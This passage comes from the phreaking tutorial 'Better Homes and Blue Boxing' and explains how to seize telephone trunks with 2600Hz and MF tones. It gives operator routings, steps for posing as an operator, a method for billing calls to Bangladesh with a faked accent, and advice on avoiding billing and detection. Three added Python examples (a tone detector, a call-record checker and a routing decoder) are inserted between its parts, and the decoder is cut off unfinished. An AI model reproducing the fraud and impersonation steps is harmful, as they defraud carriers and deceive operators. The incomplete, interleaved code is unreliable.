In this situation it would be realistic to say that CO2 uses SF in-band (2600Hz) signalling, while all the others use out-of-band signalling (3700Hz). If you don't understand this, don't worry too much. I am pointing this out merely for the sake of accuracy. The point is that while you are connected to 806-258-1234, all those trunks from YOUR central office (CO1) to the 806-258 central office (CO2) do *NOT* have 2600Hz on them, indicating to the Bell equipment that a call is in progress and the trunks are in use.

Now let's say you're tired of talking to your friend in Amarillo (806-258-1234), so you send a 2600Hz down the line. This tone travels down the line to your friend's central office (CO2), where it is detected. However, that CO thinks that the 2600Hz is originating from Bell equipment, indicating to it that you've hung up, and thus the trunks are once again idle (with 2600Hz present on them). But actually, you have not hung up; you have fooled the equipment at your friend's CO into thinking you have. Thus, it disconnects him and resets the equipment to prepare for the next call. All this happens very quickly (300-800ms for step-by-step equipment and 150-400ms for other equipment). When you stop sending 2600Hz (after about a second), the equipment thinks that another call is coming towards it (e.g. it thinks the far end has come "off-hook", since the tone has stopped). It could be thought of as a toggle switch: tone --> on-hook, no tone --> off-hook. Now that you've stopped sending 2600Hz, several things happen:

1) A trunk is seized.
2) A "wink" is sent to the CALLING end from the CALLED end, indicating that the CALLED end (trunk) is not ready to receive digits yet.
3) A register is found and attached to the CALLED end of the trunk within about two seconds (max).
4) A start-dial signal is sent to the CALLING end from the CALLED end, indicating that the CALLED end is ready to receive digits.

Now, all of this is pretty much transparent to the blue boxer. All he really hears when these four things happen is a [beep][kerchunk]. So, seizure of a trunk would go something like this:

1> Send a 2600Hz
2> Terminate 2600Hz after 1-2 secs.
3> [beep][kerchunk]

Once this happens, you are connected to a tandem that is ready to obey your every command. The next step is to send signalling information in order to place your call. For this you must simulate the signalling used by operators and automatic toll-dialing equipment for use on trunks. There are mainly two systems, DP and MF. However, DP went out with the dinosaurs, so I'll only discuss MF signalling.

MF (multi-frequency) signalling is the signalling used by the majority of the inter- and intra-LATA network. It is also used in international dialing, known as the CCITT no.5 system. MF signalling consists of 7 frequencies, beginning with 700Hz and separated by 200Hz. A different set of two of the 7 frequencies represent the digits 0 thru 9, plus an additional 5 special keys. The frequencies and uses are as follows:

Frequencies (Hz)    Domestic    Int'l
--------------------------------------
700+900             1           1
700+1100            2           2
900+1100            3           3
700+1300            4           4
900+1300            5           5
1100+1300           6           6
700+1500            7           7
900+1500            8           8
1100+1500           9           9
1300+1500           0           0
700+1700            ST3p        Code 11
900+1700            STp         Code 12
1100+1700           KP          KP1
1300+1700           ST2p        KP2
1500+1700           ST          ST

The timing of all the MF signals is a nominal 60ms, except for KP, which should have a duration of 100ms. There should also be a 60ms silent period between digits. This is very flexible, however, and most Bell equipment will accept outrageous timings. In addition to the standard uses listed above, MF pulsing also has expanded usages known as "expanded inband signalling" that include such things as coin collect, coin return, ringback, operator attached, and operator released.
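The security lesson of this whole text is that 2600Hz and the MF pairs are in-band: control signalling shared the voice channel, so anything on the talk path could inject it. The flip side is that the same tones are just as easy to measure from the network side. The Python below is an added example, not part of Better Homes and Blue Boxing; it runs a Goertzel filter over short blocks of audio (an assumed 8 kHz sample rate and 400-sample blocks, chosen so every tone in the table lands exactly on a DFT bin) to report whether 2600Hz supervisory is present and to decode an MF symbol from the domestic column of the table above. It uses the six frequencies that actually appear in the table (700 through 1700Hz in 200Hz steps). The test signals are synthesized in memory and labelled as constructed; nothing here produces audio for a line.

```python
"""Goertzel tone detector for SF (2600Hz) and the MF pairs tabulated above (added example)."""
import math
from typing import Dict, List, Optional, Sequence, Tuple

SAMPLE_RATE = 8000                 # assumed telephone-band sample rate
BLOCK = 400                        # 50 ms; 8000/400 = 20Hz bins, so every tone below is an exact bin
SF_HZ = 2600                       # supervisory (on-hook) tone from the text
MF_HZ = (700, 900, 1100, 1300, 1500, 1700)   # the six tones actually listed in the table

# Domestic column of the MF table, keyed by (lower, higher) frequency
MF_DOMESTIC: Dict[Tuple[int, int], str] = {
    (700, 900): "1", (700, 1100): "2", (900, 1100): "3", (700, 1300): "4",
    (900, 1300): "5", (1100, 1300): "6", (700, 1500): "7", (900, 1500): "8",
    (1100, 1500): "9", (1300, 1500): "0", (700, 1700): "ST3p", (900, 1700): "STp",
    (1100, 1700): "KP", (1300, 1700): "ST2p", (1500, 1700): "ST",
}
MF_PAIR = {sym: pair for pair, sym in MF_DOMESTIC.items()}   # reverse map, used only for test signals


def goertzel_power(samples: Sequence[float], freq: float, rate: int = SAMPLE_RATE) -> float:
    """Normalised power of `samples` at `freq`: a sine of amplitude A on an exact bin gives A*A/4."""
    n = len(samples)
    k = round(n * freq / rate)                  # nearest DFT bin
    coeff = 2.0 * math.cos(2.0 * math.pi * k / n)
    s1 = s2 = 0.0                               # s[n-1], s[n-2] of the Goertzel recurrence
    for x in samples:
        s1, s2 = x + coeff * s1 - s2, s1
    return (s1 * s1 + s2 * s2 - coeff * s1 * s2) / (n * n)


def supervisory_present(samples: Sequence[float], threshold: float = 0.01) -> bool:
    """True when 2600Hz is present in the block: the on-hook condition the far CO would act on."""
    return goertzel_power(samples, SF_HZ) > threshold


def decode_mf(samples: Sequence[float], threshold: float = 0.01) -> Optional[str]:
    """Return the MF symbol for the block, or None unless exactly two of the six tones are present."""
    hot = tuple(f for f in MF_HZ if goertzel_power(samples, f) > threshold)
    return MF_DOMESTIC.get(hot) if len(hot) == 2 else None


def decode_sequence(blocks: Sequence[Sequence[float]]) -> List[Optional[str]]:
    """Decode one symbol per block; a None marks a block that is not a valid MF pair."""
    return [decode_mf(b) for b in blocks]


def tone(freqs: Sequence[float], amp: float = 0.5, n: int = BLOCK, rate: int = SAMPLE_RATE) -> List[float]:
    """Constructed test signal: a sum of equal-amplitude sinusoids (not a recording)."""
    return [sum(amp * math.sin(2.0 * math.pi * f * i / rate) for f in freqs) for i in range(n)]


if __name__ == "__main__":
    # The KP+305+994+9966+ST string from the text, synthesized one block per symbol.
    symbols = ["KP", "3", "0", "5", "9", "9", "4", "9", "9", "6", "6", "ST"]
    print("decoded:", decode_sequence([tone(MF_PAIR[s]) for s in symbols]))
    print("2600Hz on an idle-trunk block:", supervisory_present(tone([SF_HZ])))
    print("2600Hz during an MF digit:", supervisory_present(tone(MF_PAIR["5"])))
```

The exact-bin block size is what keeps the thresholds simple; with real line audio you would window each block, require a tone to persist for the nominal 60ms (100ms for KP) before accepting it, and reject blocks where the two MF levels differ by more than a few dB, which is how a receiver tells a genuine pair from speech that happens to hit two of the six frequencies.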
KP2, code 11, code 12, and the STps (STart "primes") all have special uses which will be mentioned only briefly here.

To complete a call using a blue box, once seizure of a trunk has been accomplished by sending 2600Hz and pausing for the [beep][kerchunk], one must first send a KP. This readies the register for the digits that follow. For a standard domestic call, the KP would be followed by either 7 digits (if the call were in the same NPA as the seized trunk) or 10 digits (if the call were not in the same NPA as the seized trunk). [Exactly like dialing a normal fone call.] Following either the KP and 7 or 10 digits, a STart is sent to signify that no more digits follow.

Example of a complete call:

1> Dial 1-806-258-1234
2> Wait for a call-progress indication (such as ring, busy, recording, etc.)
3> Send 2600Hz for about 1 second.
4> Wait for about 2 seconds while a trunk is seized.
5> Send KP+305+994+9966+ST

The call will then connect if everything was done properly. Note that if a call to an 806 number were being placed in the same situation, the area code would be omitted and only KP+seven digits+ST would be sent.

Code 11 and code 12 are used in international calling to request certain types of operators. KP2 is used in international calling to route a call other than by way of the normal route, whether for economic or equipment reasons. STp, ST2p, and ST3p (prime, two prime, and three prime) are used in TSPS signalling to indicate the type of call (such as coin-direct dialed).

This has been Part I of Better Homes and Blue Boxing. I hope you enjoyed and learned from it. If you have any questions, comments, threats or insults, please feel free to drop me a line. If you have noticed any errors in this text (yes, it does happen), please let me know and perhaps a correction will be in order. Part II will deal mainly with more advanced principles of blue boxing, as well as routings and operators.

Note 1: other highly trunkable areas include: 816, 305, 813, 609, 205.
I personally have excellent luck boxing off of 609-953-0000. Try that if you have any trouble.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Better Homes and Blue Boxing
Part II
Practical Applications
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

The essential purpose of blue boxing in the beginning was merely to receive toll services free of charge. Though this can still be done, blue boxing has essentially outlived its usefulness in this area. Modern day "extenders" and long distance services provide a safer and easier way to make free fone calls. However, you can do things with a blue box that just can't be done with anything else. For ordinary toll-fraud, a blue box is impractical for the following reasons:

1. Clumsy equipment required (blue box or equivalent).
2. Most boxed calls must be made through an extender. Not for safety reasons, but for reasons I'll explain later.
3. Connections are often sacrificed because considerable distances must be dialed to cross a seizable trunk, in addition to awkward routing.

As stated in reason #2, boxed calls are usually made through an extender. This is for billing reasons. If you recall from Part I, 2600Hz is used as a "supervisory" signal. That is, it signals the status of a trunk: "on-hook" or "off-hook." When you seize a trunk (by briefly sending 2600Hz), your end (the CALLING end) goes on-hook for the duration of the 2600Hz and then goes off-hook once again when the 2600Hz is terminated. The CALLED end recognizes that a call is on the way and attaches a register, which interprets the digits which are to be sent. Now, understand that even though your end has come off-hook (no 2600Hz present), the other end is still on-hook. You may wonder then why, if the other end (the CALLED end) is still on-hook, there is no 2600Hz coming the other way on the trunk, when there should be. This is correct.
2600Hz *IS* present on the trunk when you seize it and afterwards, but you cannot hear it because of a Band Elimination Filter (BEF) at your central office.

Back to the problem. Remember that when you seize a trunk, 2600Hz is indeed coming the other way on the trunk because the CALLED end is still on-hook, but you don't actually hear it because of a filter. However, the Bell equipment knows it's there (they can "hear" it). The presence of the 2600Hz is telling the billing equipment that your call has not yet been completed (i.e., the CALLED end is still on-hook). When finally you do connect with your boxed call, the 2600Hz from the called end terminates. This tells the billing equipment that someone picked up the fone at the CALLED end and you should begin to be billed. So you do start to get billed, but for the call to the trunk, NOT the boxed call. Your billing equipment thinks that you've connected with the number you used to seize the trunk.

Illustration:

1. You call 1+806-258-2222 (directly)
2. Status of trunks:

   <----------------------------------->
   (You)                     806-258-2222
   No 2600Hz------->        <------------2600Hz

When you seize a trunk (before the number you called answers) there is no effect on your billing equipment. It simply thinks that you're still waiting for the call to complete (the CALLED end is still on-hook; it is ringing, busy, going to recorder or intercept operator).

Now, let's say that you've seized a trunk (806-258-2222) and dialed, for example, KP+314+949+1705+ST. The call is routed from the tandem you seized to 314-949-1705.

Illustration:

   <------------------>O<--------------->
   (You)              806           314-949
                    tandem
   No 2600Hz---------->   <----------2600Hz

Note that the entire path towards the right (the CALLED end) has no 2600Hz present and is therefore "off-hook." The entire path towards the left (the CALLING end) does have 2600Hz present on it, indicating that the CALLED end has not picked up (or come "off-hook").
When 314-949-1705 answers, "answer supervision" is given and the 2600Hz towards the left (the CALLING end) terminates. This tells your billing equipment, which thinks that you're still waiting to be connected with 806-258-2222, that you've finally connected. Billing then begins to 806-258-2222. Not exactly an auspicious beginning for an aspiring young phone phreak.

To avoid this, several actions may be taken. As previously mentioned, one may avoid being charged for the number called to seize a trunk by using an extender (in which case the extender will get billed). In some areas, boxing may be accomplished using an 800 number, generally in the format of 800-858-xxxx (many Amarillo numbers) or 800-NN2-xxxx (special intra-state class in-WATS numbers). However, boxing off of 800 numbers is impossible in many areas. In my area, Denver, I am served by #1A ESS and it is impossible for me to box off of any 800 number.

Years ago, in the early days of blue boxing (before my time), phreaks often used directory assistance to box off of because they were "free" long distance calls. However, because of competitive long distance companies, directory assistance surcharges are now $0.50 in many areas. It is additionally advised that directory assistance numbers not be used to box from because of the following: average DA calls last under 2 minutes. When you box a call, chances are that it will last considerably longer. Thus, the Bell billing equipment will make a note of calls to directory assistance that last a long time. A call to a directory assistant lasting for 4 hours and 17 minutes may appear somewhat suspicious. Although the date, time, and length of a DA call do not appear on the bill, it is recorded on AMA tape and will trip a trouble report if it were to last too long. This is how most phreaks were discovered in the old days. Also, sometimes too many calls lasting too long to one 800 number may raise a few eyebrows at the local security office.
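The two billing-side checks the paragraph above describes, as an added example that is not part of the original article: a directory assistance call that runs far past the under-two-minute norm, and repeated long calls from one line to a single 800 number, both run over AMA-style call records. The records are constructed (555-01xx numbers are reserved fictitious numbers; 806-555-1212 is DA for the Amarillo NPA the text uses), and the thresholds, field layout and number formats are my assumptions, not Bell's actual rules or data.

```python
"""Review of constructed AMA-style call records for the two patterns the
text says drew attention: over-long DA calls and repeated long calls to
one 800 number. Added example; thresholds and records are assumptions."""
from collections import Counter, namedtuple

CallRecord = namedtuple("CallRecord", "caller called start duration_s")

DA_MAX_SECONDS = 600          # assumed: five times the "under 2 minutes" DA norm
TOLLFREE_LONG_SECONDS = 1800  # assumed: what counts as a "long" 800 call
TOLLFREE_REPEAT_LIMIT = 3     # assumed: how many long calls to one 800 number is too many


def digits_of(number):
    return "".join(ch for ch in number if ch.isdigit())


def is_directory_assistance(number):
    """NPA-555-1212 or plain 555-1212, the DA numbers named in the text."""
    d = digits_of(number)
    return len(d) in (7, 10) and d.endswith("5551212")


def is_toll_free(number):
    """Only the 800 NPA carried in-WATS service in the period the text describes."""
    d = digits_of(number)
    return len(d) == 10 and d.startswith("800")


def review_records(records):
    """Return (caller, called, reason) findings, DA findings first."""
    findings = []
    long_tollfree = Counter()
    for r in records:
        if is_directory_assistance(r.called) and r.duration_s > DA_MAX_SECONDS:
            findings.append((r.caller, r.called,
                             "DA call lasted %d s (limit %d)" % (r.duration_s, DA_MAX_SECONDS)))
        if is_toll_free(r.called) and r.duration_s > TOLLFREE_LONG_SECONDS:
            long_tollfree[(r.caller, r.called)] += 1
    for (caller, called), n in long_tollfree.items():
        if n >= TOLLFREE_REPEAT_LIMIT:
            findings.append((caller, called,
                             "%d calls longer than %d s to one 800 number"
                             % (n, TOLLFREE_LONG_SECONDS)))
    return findings


# Constructed records (not real AMA data).
SAMPLE_RECORDS = [
    CallRecord("303-555-0100", "303-555-1212", "1990-09-01 09:12", 90),     # ordinary DA call
    CallRecord("303-555-0100", "806-555-1212", "1990-09-01 21:03", 15420),  # 4 h 17 min to DA
    CallRecord("303-555-0100", "806-258-1234", "1990-09-02 10:30", 300),    # ordinary toll call
    CallRecord("303-555-0101", "800-858-0100", "1990-09-02 11:00", 120),    # one short 800 call
    CallRecord("303-555-0100", "800-858-0100", "1990-09-03 22:00", 3600),
    CallRecord("303-555-0100", "800-858-0100", "1990-09-04 22:10", 5400),
    CallRecord("303-555-0100", "800-858-0100", "1990-09-05 23:00", 7200),
    CallRecord("303-555-0100", "800-858-0100", "1990-09-06 22:30", 4000),
]

if __name__ == "__main__":
    for finding in review_records(SAMPLE_RECORDS):
        print(*finding)
```

The point of keying the 800-number count on the (caller, called) pair rather than on the called number alone is that one legitimately busy 800 number receives many long calls from many lines; it is the same line returning to it for hours at a time that stands out.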
Assuming you can complete a blue box call, the following are listed routings for various Bell internal operators. These are in the format of KP+NPA+special routing+1X1+ST, which I will explain later. The 1X1 is the actual operator routing, and NPA and NPA+special routing are used for out-of-area-code calls and out-of-area-code calls requiring special routing, respectively.

KP+101+ST ...... toll test board
KP+121+ST ...... inward op
KP+131+ST ...... directory assistance
KP+141+ST ...... was rate & route. Now only works in 312, 815, 717, and a few others. It has been replaced with a universal rate & route number, 800+141+1212.
KP+151+ST ...... overseas completion operator (inbound). Works only in certain NPAs, such as 303.
KP+181+ST ...... in some areas, toll station for small towns

Thus, if you seized a trunk in 806 NPA and wanted an inward (in 806), then you would dial KP+121+ST. If you wanted a 312 inward and were dialing on an 806 trunk, an area code would be required. Thus, you would dial KP+312+121+ST. Finally, some places in the network require special routing, in addition to an area code. An example is Franklin Park, Ill. It requires a special routing of 032. For this, you would dial KP+312+032+121+ST for a Franklin Park inward operator. Special routings are in the format of 0XX. They are used primarily for load balance, so that traffic flow may be evenly distributed. About half of the exchanges in the network require special routing. Note that special routings are NEVER EVER EVER used to dial normal telephone numbers, only operators.

Operator functions:

TOLL TEST BOARD - Generally a cordboard position that assists in trunk testing. They are not used by operators, only switchmen.

INWARD - Assists the normal TSPS (0+) operator in completing calls out of the TSPS's area. Also, inwards perform emergency interrupts when the number to be interrupted is out of the area code of the original (TSPS) operator.
For example, a 303 operator has a customer that needs an emergency interrupt on 215-647-6969. The 303 operator gets the routing for the inward that covers 215-647, since she cannot do the interrupt herself. The routing is found to be only 215+ (no special routing required). So, the 303 operator keys KP+215+121+ST. An inward answers and the 303 says to her, "Inward, this is Denver. I need an emergency interrupt on 215-647-6969. My customer's name is Mark Tabas." The inward will then do the interrupt (off the line, of course). If the number to be interrupted had required special routing, such as, say, 312-456-1234 (spec routing 032), then the 303 operator would dial KP+312+032+121+ST for the inward to do that interrupt.

DIRECTORY ASSISTANCE - These are the normal NPA+555+1212 operators that assist customers with obtaining telefone directory listings. Not much toll-fraud potential here, except maybe $0.50.

RATE AND ROUTE - These operators are reached by dialing KP+800+141+1212+ST. They assist normal (TSPS) operators with rates and routings (thus the name). The only uses I typically have for them are the following:

1. Routing information. In the above example, when the 303 operator needed to dial an inward that served 215-647, she needed to know if any special routing was required and, if so, what it was. Assuming she would use rate and route, she would dial them and say nicely, "Operator's route, please, for 215-647." Rate & route would respond with "215 plus." This means that the operator would dial KP+215+121+ST to reach the inward that serves 215-647. If there were special routing required, such as in 312-456, rate & route would respond with "312 plus 032 plus." In that case, the operator would dial KP+312+032+ST for the inward that serves 312-456. It is good practice to ask for "operator's route" specifically, as there are also "numbers route" and "directory routes."
If you do not specifically ask for operator's route, rate & route will generally assume that is what you want anyway. "Numbers" route refers to overseas calls. Example: you want to know how to reach a number in Geneva, Switzerland (and you already have the number). You would call routing and say "Numbers route, please, Geneva, Switzerland." The operator would respond with: "Mark 41+22. 011+041+ST (plus) 041+22". The "Mark 41+22" has to do with billing, so disregard it. The 011+041 is access to the overseas gateway (to be discussed in Part III) and the 041+22+ is the routing for Geneva from the overseas sender. "Directory" routings are for directory assistance overseas. Example: you want a DA in Rome, Italy. You would call rate & route and say, "Directory routing please, for Rome, Italy." They would respond with "011+039+ST (plus) 039+1108 STart." As in the previous example, the 011+039 is access to the overseas gateway. The 039+1108 is a directory assistant in Rome.

2. Nameplace information. Rate & route will give you the location of an NPA+exchange. Example: "Nameplace please, for 215-648." The operator would respond with "Paoli, Pennsylvania." This isn't especially useful, since you can get the same information (legally) by dialing 0, but using rate & route is often much faster and it avoids having to hang up when you are already on a trunk.

*NOTE on Rate & Route: As a blue boxer, always ask for "IOTC" routings (e.g., "IOTC operator's route", "IOTC numbers route", etc.). This tells them that you want cordboard-type routings, not TSPS, because a blue boxer is actually just a cordboard position (that Bell doesn't know about).

OVERSEAS COMPLETION OPERATOR (inbound) - These operators (KP+151+ST) assist in the completion of calls coming in to the United States from overseas. There are KP+151+ST operators only in a few NPAs in the country (namely 303). To use one, you would seize a trunk and dial KP+303+151+ST.
Then you would tell the operator, for example, "This is Bangladesh calling. I need U.S. number 215-561-0562 please." [in a broken Indian accent]. She would connect you, and the bill would be sent to Bangladesh (where I've been billing my KP+151+ST calls for two years).

Other internal Bell operators:

KP+11501+ST ...... universal operator
KP+11511+ST ...... conference op
KP+11521+ST ...... mobile op
KP+11531+ST ...... marine op
KP+11541+ST ...... long distance terminal
KP+11551+ST ...... time & charges op
KP+11561+ST ...... hotel/motel op
KP+11571+ST ...... overseas (outbound) op

These 115X1 operators are identical in routing to the 1X1 operators listed previously, with one exception. If special routing is required (0XX), then the trailing 1 is left off. Examples:

A 312 universal op ................................................ KP+312+11501+ST
A Franklin Park (312-456) universal op (special routing 032 required) .. KP+312+032+1150+ST
   [The trailing 1 of 11501 is left off.]

Purposes of 115X1 operators:

UNIVERSAL - Used for collect/callback calls to coin stations.
CONFERENCE - This is a cordboard conference operator who will set up a conference for a customer on a manual operation basis.
MOBILE - Assists in completion of calls to mobile (IMTS) type telefones.
MARINE - Assists in completion of calls to ocean-going vessels.
LONG DISTANCE TERMINAL - Now obsolete. Was used for completion of long distance calls.
TIME & CHARGES - Will give exact costs of calls. Used to time calls and inform the customer of exactly how much it cost.
HOTEL/MOTEL - Handles calls to/from hotels and motels.
OVERSEAS COMPLETION (outbound) - Assists in completion of calls to overseas points. Only works in some, if any, NPAs, because overseas assistance has been centralized to IOCC (covered in Part III).

Note that all KP+1X1+ST and KP+115X1+ST operators automatically assume that you are a TSPS or cordboard operator assisting a customer with a call. DO NOT DO ANYTHING TO JEOPARDIZE THIS!
If you do not know what to do, don't call these operators! Find out what to do first.

This concludes Part II. There is one final part in which I will explain overseas dialing, IOCC (International Overseas Completion Centre), RQS (Rate/Quote System), and some basic scanning.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Better Homes and Blue Boxing
Part III
Advanced Signalling
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

(It is assumed that the reader has read and understood Parts I & II before proceeding to this part.)

In Parts I & II, I covered basic theory and domestic signalling and operators. In this part I will explain overseas direct boxing, the IOCC, the RQS, and some basic scanning methods.

Overseas Direct Boxing.

Calling outside of the United States and Canada is accomplished by using an "overseas gateway." There are 7 overseas gateways in the Bell System, and each one is designated to serve a certain region of the world. To initiate an overseas call, one must first access the gateway that the call is to be sent on. To do this automatically, decide which country you are calling and find its country code. Then, pad it to the left with zeros as required so it is three digits. [Add 1, 2, or 3 zeros as required.] Examples:

   Luxembourg (352) is 352 (stays the same)
   Spain (34) becomes 034 (1 zero added)
   U.S.S.R. (7) becomes 007 (2 zeros added)

Next, seize a trunk and dial KP+011+CC+ST. Note that CC is the three-digit padded country code that you just determined by the above method. [For Luxembourg, dial KP+011+352+ST; Spain, KP+011+034+ST; and the U.S.S.R., KP+011+007+ST.] This is done to route you to the appropriate overseas gateway that handles the country you are dialing. Even though every gateway will allow you to dial every dialable country, it is good practice to use the gateway that is designated for the country you are calling. After dialing KP+011+CC+ST (as CC is defined above) you should be connected to an overseas gateway.
It will acknowledge by sending a wink (which is audible as a [beep][kerchunk]) and a dial tone. Once you receive international dial tone, you may route your call one of two ways: a) as an operator-originated call, or b) as a customer-originated call.

To go as a customer-originated call, key KP+country code (NOT padded with zeros)+city code+number+ST. You will then be connected, providing the country you are calling can receive direct-dialed calls. The U.S.S.R. is an example of a country that cannot.

Example of a boxed int'l call: To make a call to the Pope (Rome, Italy), first obtain the country code, which is 39. Pad it with zeros so that it is 039. Seize a trunk and dial KP+011+039+ST. Wait for sender dial tone and then dial KP+39+6+6982+ST. 39 is the country code, 6 is the city code, and 6982 is the Pope's number in Rome.

To go as an operator-originated call, simply place a zero in front of the country code when dialing on the gateway. Thus, KP+0+39+6+6982+ST would be dialed at sender dial tone. Routing your call as operator-originated does not affect much unless you are dialing an operator in a foreign country.

To dial an operator in a foreign country, you must first obtain the operator routing from rate & route for that country. Dial rate & route and, if you're trying to get an operator in Yugoslavia, say nicely, "IOTC Operator's route, please, for Yugoslavia." [In larger countries it may be necessary to specify a city.] Rate & route will respond with, "38 plus 11029". So, dial your overseas gateway, KP+011+038+ST, wait for sender dial tone, and key KP+0+38+11029+ST. You should then get an operator in Yugoslavia. Note that you must prefix the country code on the sender with a 0 because presumably only an operator here can dial an operator in a foreign country.

When you dial KP+011+CC+ST for an overseas gateway, it is translated to a 3-digit sender code of the format 18X, depending on which sender is designated to handle the country you are dialing.
The overseas gateways and their 3-digit codes are listed below.

   182 ..... White Plains, NY
   183 ..... New York, NY
   184 ..... Pittsburgh, PA
   185 ..... Orlando, FL
   186 ..... Oakland, CA
   187 ..... Denver, CO
   188 ..... New York, NY

Dialing KP+182+ST would get you the sender in White Plains, and KP+183+ST would get the sender in NYC, etc., but the KP+011+CC+ST is highly suggested (as previously mentioned). To find out what sender you were routed to after dialing KP+011+CC+ST, dial (at int'l dial tone) KP+0000000+ST. If you have difficulty in reaching a sender, call rate and route and ask for a numbers route for the country you're dialing. Sometimes, KP+011+padded country code+ST will not work. I have found this in many 3-digit country codes. Luxembourg, country code 352, for example, should be KP+011+352+ST theoretically. But it is not. In this case, dial KP+011+003+ST for the overseas gateway. If you have trouble, try dialing KP+00+first digit of country code+ST, or call rate

The IOCC.

Sometimes when you call rate and route and ask for an "IOTC numbers route" or "IOTC operators route" for a foreign country, you will get something like "160+700" (as in the case of the Soviet Union). This means that the country is not dialable directly and must be handled through the International Overseas Completion Centre (IOCC). For an IOCC routing, pad the country code to the RIGHT with zeros until it is 3 digits. Then KP+160 is dialed, plus the padded country code, plus ST. Examples:

   The U.S.S.R. (7) ...... KP+160+700+ST
   Japan (81) ............ KP+160+810+ST
   Uruguay (598) ......... KP+160+598+ST

You will then be routed to the IOCC in Pittsburgh, PA, who will ask for country, city, and number being dialed. Many times they will ask for a ringback [thanks to Telenet Bob], so have a loop ready. They will then place the call and call you back (or sometimes put you through directly). Some calls, such as to Moscow, take several hours.

The Rate Quote System (RQS).
The RQS is the operator's rate/quote system. It is a computer used by TSPS (0+) operators to get rate and route information without having to dial the rate and route operator. In Part II, I discussed getting an inward routing for dialing assistance and emergency interrupts from the rate and route operators (KP+800+141+1212+ST). The same information is available from RQS.

Say you want the inward routing for 305-994. You would seize a trunk and dial KP+009+ST (to access the RQS). Sometimes, if you seize a trunk in an NPA not equipped with RQS, you need to dial an NPA that is equipped with RQS first, such as 303. Anyway, after you dial KP+009+ST or KP+303+009+ST, you will receive a wink ([beep][kerchunk]) and then RQS dial tone. At RQS dial tone, for an inward routing for 305-994 you would dial KP+06+305+994+ST. That is, KP+06+NPA+exchange+ST. RQS will respond with "305 plus 033 plus". This means you would dial KP+305+033+121+ST for an inward that services 305-994. If no special routing were required, RQS would have responded with "305 plus" and you would simply dial KP+305+121+ST for an inward.

Another RQS feature is the echo feature. You can use it to test your blue box. Dial RQS (KP+009+ST) and then key KP+07+1234567890+ST. RQS will respond with voice identification of the digits it recognized between the KP+07 and ST. RQS can also be used for rates and directory routings, but those are seldom needed, so they have been omitted here.

Simple Scanning.

If you're interested in scanning, try dialing, on a trunk, routings in the format of KP+11XX1+ST. Begin with 11001 and scan to 11991. There are lots of interesting things to be found there, as Doctor Who (413 area) can tell you. Those 11XX1 routings can also be prefixed with an NPA, so if you want to scan area code 212, dial KP+212+11XX1+ST.

There, now you know as much about blue boxing as most phreaks.
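A decoder for the KP+...+ST routing format used throughout Parts II and III, as an added example that is not part of the original article. Given a routing written the way the text writes them, it labels it using the rules above: optional NPA, optional 0XX special routing, the 1X1 and 115X1 operator codes (with the trailing 1 dropped when 0XX is present), 011+CCC overseas gateways (country code padded on the left), the 18X senders, 160+CCC IOCC routings (padded on the right), the NPA+009 RQS access code, and plain 7- or 10-digit numbers. The operator names and sender cities are the page's own lists; the assumption that a real exchange code never begins with 0 (which is what separates 312+032+1150 from a 10-digit number) is mine. Reading a captured digit string back into its meaning is the analysis task an investigator or a switch engineer faces, not a dialing aid.

```python
"""Decode KP+...+ST routings into their meaning (added example, not from
the original article). Tables come from the text; the exchange-code rule
is an assumption."""
import re

OPERATORS_1X1 = {
    "101": "toll test board",
    "121": "inward operator",
    "131": "directory assistance",
    "141": "rate & route (old form)",
    "151": "overseas completion operator (inbound)",
    "181": "toll station",
}
OPERATORS_115X1 = {
    "11501": "universal operator",
    "11511": "conference operator",
    "11521": "mobile operator",
    "11531": "marine operator",
    "11541": "long distance terminal",
    "11551": "time & charges operator",
    "11561": "hotel/motel operator",
    "11571": "overseas (outbound) operator",
}
SENDERS = {
    "182": "White Plains, NY", "183": "New York, NY", "184": "Pittsburgh, PA",
    "185": "Orlando, FL", "186": "Oakland, CA", "187": "Denver, CO", "188": "New York, NY",
}


def _groups(routing):
    """Split 'KP+a+b+ST' into ['a', 'b'], rejecting anything not in that shape."""
    parts = routing.upper().replace(" ", "").split("+")
    if len(parts) < 3 or parts[0] != "KP" or parts[-1] != "ST":
        raise ValueError("expected KP+...+ST, got %r" % routing)
    body = parts[1:-1]
    if not all(re.fullmatch(r"\d+", g) for g in body):
        raise ValueError("non-digit group in %r" % routing)
    return body


def _operator(groups):
    """Match [NPA] [0XX] code, or return None if this is not an operator routing."""
    rest, code = list(groups[:-1]), groups[-1]
    special = rest.pop() if rest and re.fullmatch(r"0\d\d", rest[-1]) else None
    npa = rest.pop() if rest and re.fullmatch(r"[2-9]\d\d", rest[-1]) else None
    if rest:
        return None                                   # leftover groups: not an operator
    if re.fullmatch(r"1\d1", code):
        name = OPERATORS_1X1.get(code)
    elif special is None and re.fullmatch(r"115\d1", code):
        name = OPERATORS_115X1.get(code)
    elif special is not None and re.fullmatch(r"115\d", code):
        code += "1"                                   # trailing 1 is dropped with 0XX
        name = OPERATORS_115X1.get(code)
    else:
        return None
    if name is None:
        return None
    return {"kind": "operator", "code": code, "name": name,
            "npa": npa, "special_routing": special}


def decode_routing(routing):
    """Return a dict describing what the routing reaches."""
    g = _groups(routing)
    if len(g) == 2 and g[0] == "011" and len(g[1]) == 3:
        return {"kind": "overseas gateway", "country_code": g[1].lstrip("0")}
    if len(g) == 2 and g[0] == "160" and len(g[1]) == 3:
        return {"kind": "IOCC", "country_code": g[1].rstrip("0")}
    if len(g) == 1 and g[0] in SENDERS:
        return {"kind": "overseas sender", "code": g[0], "location": SENDERS[g[0]]}
    if g[-1] == "009" and len(g) <= 2 and all(len(x) == 3 for x in g):
        return {"kind": "RQS", "npa": g[0] if len(g) == 2 else None}
    op = _operator(g)
    if op is not None:
        return op
    digits = "".join(g)
    if len(digits) == 7 and digits[0] != "0":
        return {"kind": "number", "npa": None, "number": digits}
    # Assumption: an exchange code (digits 4-6 of a 10-digit number) never starts with 0,
    # so anything with a 0XX in that position is special routing, never a phone number.
    if len(digits) == 10 and digits[0] != "0" and digits[3] != "0":
        kind = "rate & route (universal)" if digits == "8001411212" else "number"
        return {"kind": kind, "npa": digits[:3], "number": digits[3:]}
    return {"kind": "unknown", "digits": digits}


if __name__ == "__main__":
    for r in ("KP+121+ST", "KP+312+032+121+ST", "KP+312+032+1150+ST",
              "KP+011+034+ST", "KP+160+810+ST", "KP+303+009+ST", "KP+305+994+9966+ST"):
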